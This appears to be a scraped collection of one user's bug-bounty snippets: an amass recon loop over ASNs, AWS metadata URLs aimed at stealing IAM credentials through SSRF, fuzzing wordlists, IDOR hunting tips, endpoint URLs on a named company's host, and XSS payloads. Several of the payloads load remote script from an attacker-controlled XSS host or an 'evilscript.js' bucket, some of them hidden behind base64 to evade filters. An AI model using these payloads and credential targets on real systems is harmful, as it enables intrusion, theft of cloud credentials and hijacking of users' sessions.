Uyavuz24

#!/bin/bash

asnlist=(59055 59054 59053 5905 259051 59028 45104 45103 45102 45096 37963 34947 134963)
for i in ${asnlist[@]} ; do
	amass intel -active -asn $i -p 80,4443,2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,744
	echo "searching $i"
done

Uyavuz24

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Uyavuz24

import requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)

# another source of cidrs by asn
def getIPCidrs(asn):

Uyavuz24

/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents

Uyavuz24

* If worldist can't find anything on api, use hakrawler
* every domain could have an api. add jSON extension to endpoints and see response
* If IDs are not numerical. Try to find leaked IDs from other places. (e.g.: posts the user created, and other features)
* Some endpoints will return you UUID as a response to e-mail adress etc...
* If there is no leak of User ID, just swap with user id of another account you created
* Look for permissions in every endpoint
* change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, Arjun it
* Use all HTTP Request methods
* Look for IDORs in HTTP headers and body

Uyavuz24

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0

http://apps.bentley.com:80/claimsviewerims
http://apps.bentley.com:80/claimsviewerims/default.aspx
http://apps.bentley.com:80/srmanager
http://apps.bentley.com:80/srmanager/AccountSRs
http://apps.bentley.com:80/srmanager/AccountSRs/SRList
http://apps.bentley.com:80/srmanager/Billing
http://apps.bentley.com:80/srmanager/Billing/ProblemArea
http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact

Uyavuz24

<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)>  //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)')  //For use where URI's are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags 

Uyavuz24

/
/*
/*.*
/*?
/*?*
/.../.../.../
/./
//
///
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Uyavuz24

X-Forwarded-Host:
Host:
Referer:
X-Forwarded-For:

Uyavuz24

/
!
!=
&&
*
*&
*.*
*?
*?*
.../.../.../